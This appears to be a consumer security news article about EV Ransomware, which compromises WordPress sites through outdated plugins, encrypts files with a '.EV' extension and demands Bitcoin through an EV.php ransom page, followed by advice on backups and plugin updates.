EV Ransomware Puts WordPress Websites in Its Crosshairs

wordpress sites attacked by ev ransomwareRansomware threats have been particularly active in 2017. They are known as a Trojan that gets on one's computer, encrypts their files and asks for money in return for a decryption key. However, this isn't exactly always the case. The ransomware in question today is of a less known variety of this highly dangerous threat and is thought to originate from Indonesia.

How EV Ransomware Infects PCs

This new threat that has emerged goes by the name EV Ransomware. What makes it special is that instead of targeting the files on a certain computer, it goes after websites that run WordPress. The authors of EV Ransomware are exploiting vulnerabilities which could be found in certain plugins, usually outdated ones. If such is found and the threat could obtain administrator credentials and would find its way into the server. From then on, it's easy-peasy – EV Ransomware dumps its payload and infects the server. Upon infecting the target, the creators of EV Ransomware are required to manually run the file-locker and set up the key which is to encrypt the data targeted. With this being done EV Ransomware would inform its authors via email about data regarding the victim such as domain name, address and the encryption key used. The email containing this data would be sent to htaccess12@gmail.com which is the attackers' email address. When the encryption is completed all the files affected will have a ".EV" extension. The decrypter appears to be implemented in the files dropped by the ransomware. The victim will receive a ransom note in the shape of a .php file named "EV.php". The note will be located in the main directory of their WordPress system. When the victim loads the decryption page, they'll be prompted to pay a ransom sum of 0.2 (approximately $900) Bitcoins in exchange for a decryption key that must be entered in the compromised website to start the file decryption process.

Encryption Method

The encryption module that EV Ransomware relies on is quite complex, and it is clear that the authors have spared no resources and time to come up with a secure way to lock the files of their victims. When the crypto malware's attack begins, it will use the embed private key of the attacker, and then use SHA-256 to hash it, therefore makings its decryption a nearly impossible task. When a file's contents have been successfully encrypted, they'll be encoded via base64, and then written to the encrypted version of the file. Last but not least, the newly created encrypted file will also have the '.EV' extension appended to its name.

No Way to Decrypt Your Files

In case EV Ransomware has affected you, don't bother paying the ransom. Not only is it never a good option to pay up, this time the authors of the threat don't even have a working mechanism that will provide you with a decryption key at all. However, what you should do to protect yourself from such nasty threats is to always back up your important files on an offline hard drive. Also, just like keeping all your software up to date on your computer would minimize the risk of infection, keeping all your plugins up to date on WordPress would do the same. Despite how tedious it gets constantly updating apps and plugins, you shouldn't neglect it, or you risk having to deal with pests such as EV Ransomware.